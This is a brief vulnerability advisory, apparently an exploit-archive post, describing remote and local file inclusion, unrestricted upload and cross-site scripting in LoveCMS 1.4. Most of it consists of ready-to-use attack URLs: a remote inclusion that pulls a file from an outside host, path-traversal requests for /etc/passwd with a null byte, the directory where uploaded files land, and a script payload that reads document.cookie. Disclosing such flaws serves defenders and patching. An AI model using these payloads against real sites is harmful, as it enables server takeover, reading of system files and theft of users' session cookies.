LoveCMS version 1.4 suffers from remote file inclusion, local file inclusion, upload, and cross site scripting vulnerabilities.
b4c06f402594787fbc8b67891cda22645a46914265b6ada776a3002230fd2924
rfi:
/lovecms/install/index.php?step=https://site.com/boum.txt?
lfi:
/lovecms/install/index.php?step=/etc/passwd%00
/lovecms/?load=../../../../../../../../../../etc/passwd%00
admin upload vuln :
upload any kind of file even if it's not accepted it will be stored here :
/modules/content/pictures/tmp/
xss get via error sql:
/lovecms/?load=content&id='</textarea>'"><script>alert(document.cookie)</script>
laurent gaffiƩ